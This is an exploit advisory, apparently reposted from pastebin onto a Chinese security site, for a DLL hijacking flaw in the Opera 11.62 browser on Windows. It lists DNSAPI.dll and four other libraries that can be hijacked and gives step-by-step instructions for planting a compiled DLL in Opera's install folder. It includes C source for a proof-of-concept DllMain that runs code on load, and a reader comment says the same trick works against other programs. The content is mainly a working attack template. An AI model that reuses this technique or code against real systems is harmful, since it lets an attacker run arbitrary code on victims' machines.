+----------------------------------------------------------------------+
|            ____  _            _           _____ _____                |
|           |  _ \| |          | |         |_   _|  __ \               |
|           | |_) | | __ _  ___| | __  _____ | | | |  | |              |
|           |  _ <| |/ _` |/ __| |/ / |_____|| | | |  | |              |
|           | |_) | | (_| | (__|   <        _| |_| |__| |              |
|           |____/|_|\__,_|\___|_|\_\      |_____|_____/               |
|                                                                      |
|/********************************************************************\|
|                                                                      |
|  [x] Exploit Title: Opera (11.62) DLL Hijacking (Multiple)           |
|  [x] Version    : 11.62                                              |
|  [x] WebSite    : http://www.opera.com                               |
|  [x] Author: Black-ID                                                |
|  [x] Tested on: Win Xp/7                                             |
+----------------------------------------------------------------------+
|[~] The Infected Dll Librarys Are DNSAPI.dll                          |
|                                  SETUPAPI.dll                        |
|                                  Iphlpapi.dll                        |
|                                  hnetcfg.dll                         |
|                                  rasadhlp.dll                        |
|[+] You Can Hijack Easly The Latest Version Of Opera (11.62)          |
|[+] Compile code as DNSAPI.dll or Other Infected Library              |
|[+] Move DLL File To The Directory Where Opera Is Installed           |
+----------------------------------------------------------------------+

[+]Exapmle: DNSAPI.dll (code)

*/

#include "stdafx.h"

void init() {
    MessageBox(NULL,"Own3d By Black-ID", "Dis9 Labs",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        init();break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    break;
    }
    return TRUE;
}

*/

转自:http://pastebin.com/ea4WAtAN#

留言评论(旧系统):

晴天小铸 @ 2012-07-05 22:15:30

很多程序的小缺陷默认是everyone 导致可以ring3层的很多DLL默认程序可以劫持 搜狗 zend 某些迅雷 某些程序。。。

本站回复:

http://lcx.cc/?i=1399